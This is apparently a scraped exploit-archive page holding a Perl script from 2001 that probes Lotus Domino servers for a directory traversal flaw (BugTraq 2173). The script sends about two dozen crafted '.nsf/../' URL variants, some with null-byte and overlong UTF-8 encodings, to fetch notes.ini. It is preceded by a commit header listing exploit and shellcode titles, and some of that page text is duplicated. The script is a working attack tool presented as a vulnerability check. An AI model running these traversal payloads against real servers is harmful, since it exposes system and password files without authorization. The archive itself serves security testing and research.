880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
86 lines
No EOL
3.3 KiB
Perl
Executable file
86 lines
No EOL
3.3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/2173/info
|
|
|
|
It is possible for a remote user to gain access to any known file residing on the Lotus Domino Server 5.0.6 and previous. A specially crafted HTTP request comprised of '.nsf' and '../' along with the known filename, will display the contents of the particular file with read permissions.
|
|
|
|
Successful exploitation of this vulnerability could enable a remote user to gain access to systems files, password files, etc. This could lead to a complete compromise of the host.
|
|
|
|
#!/usr/bin/perl
|
|
# PERL script to test a Domino server for directory
|
|
# traversal vulnerability. (BugTraq ID 2173,
|
|
# https://www.securityfocus.com/bid/2173)
|
|
#
|
|
# Michael Smith, http://www.netlocksmith.com
|
|
# 01/15/2001
|
|
#
|
|
# Credit & thanks to all of these folks:
|
|
#
|
|
# - To Georgi Guninski, http://www.guninski.com,
|
|
# who discovered the original vulnerability,
|
|
# and Ralph Moonen of KPMG, who found additional
|
|
# URL variations
|
|
#
|
|
# - Roelof Temmingh, http://www.sensepost.com,
|
|
# author of unicodecheck.pl, on which this
|
|
# script is based
|
|
#
|
|
# - Rain Forest Puppy, http://www.wiretrip.com,
|
|
# author of Sendraw routine
|
|
#
|
|
use Socket;
|
|
# --------------init
|
|
if ($#ARGV<0) {die "Usage: nsfcheck targetIP[:port]";}
|
|
($host,$port)=split(/:/,@ARGV[0]);
|
|
if ($port=="") {$port=80;}
|
|
print "Testing $host:$port\n";
|
|
$target = inet_aton($host);
|
|
|
|
@notesvuln=( "/%00%00.nsf/../lotus/domino/notes.ini",
|
|
"/%00%20.nsf/../lotus/domino/notes.ini",
|
|
"/%00%c0%af.nsf/../lotus/domino/notes.ini",
|
|
"/%00...nsf/../lotus/domino/notes.ini",
|
|
"/%00.nsf//../lotus/domino/notes.ini",
|
|
"/%00.nsf/../lotus/domino/notes.ini",
|
|
"/%00.nsf/..//lotus/domino/notes.ini",
|
|
"/%00.nsf/../../lotus/domino/notes.ini",
|
|
"/%00.nsf.nsf/../lotus/domino/notes.ini",
|
|
"/%20%00.nsf/../lotus/domino/notes.ini",
|
|
"/%20.nsf//../lotus/domino/notes.ini",
|
|
"/%20.nsf/..//lotus/domino/notes.ini",
|
|
"/%c0%af%00.nsf/../lotus/domino/notes.ini",
|
|
"/%c0%af.nsf//../lotus/domino/notes.ini",
|
|
"/%c0%af.nsf/..//lotus/domino/notes.ini",
|
|
"/...nsf//../lotus/domino/notes.ini",
|
|
"/...nsf/..//lotus/domino/notes.ini",
|
|
"/.nsf///../lotus/domino/notes.ini",
|
|
"/.nsf//../lotus/domino/notes.ini",
|
|
"/.nsf//..//lotus/domino/notes.ini",
|
|
"/.nsf/../lotus/domino/notes.ini",
|
|
"/.nsf/../lotus/domino/notes.ini",
|
|
"/.nsf/..///lotus/domino/notes.ini",
|
|
"/.nsf%00.nsf/../lotus/domino/notes.ini",
|
|
"/.nsf.nsf//../lotus/domino/notes.ini",
|
|
"/.nsf.nsf/..//lotus/domino/notes.ini");
|
|
|
|
# ----- Test each possible version of vulnerability -----
|
|
foreach $notespath (@notesvuln) {
|
|
my @results=sendraw("GET ".$notespath." HTTP\/1.0\r\n\r\n");
|
|
foreach $line (@results){
|
|
if ($line =~ /\[Notes\]/) {$flag=1;}
|
|
}
|
|
}
|
|
if ($flag==0) {die("No vulnerability found at this address.\n");}
|
|
else {die("This site is vulnerable.\n");}
|
|
|
|
# ------------- Sendraw
|
|
sub sendraw {
|
|
my ($pstr)=@_;
|
|
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
|
|
die("Socket problems\n");
|
|
if(connect(S,pack "SnA4x8",2,$port,$target)){
|
|
my @in;
|
|
select(S); $|=1; print $pstr;
|
|
while(<S>){ push @in, $_;}
|
|
select(STDOUT); close(S); return @in;
|
|
} else { die("Can't connect...\n"); }
|
|
}
|
|
# ---------------------- |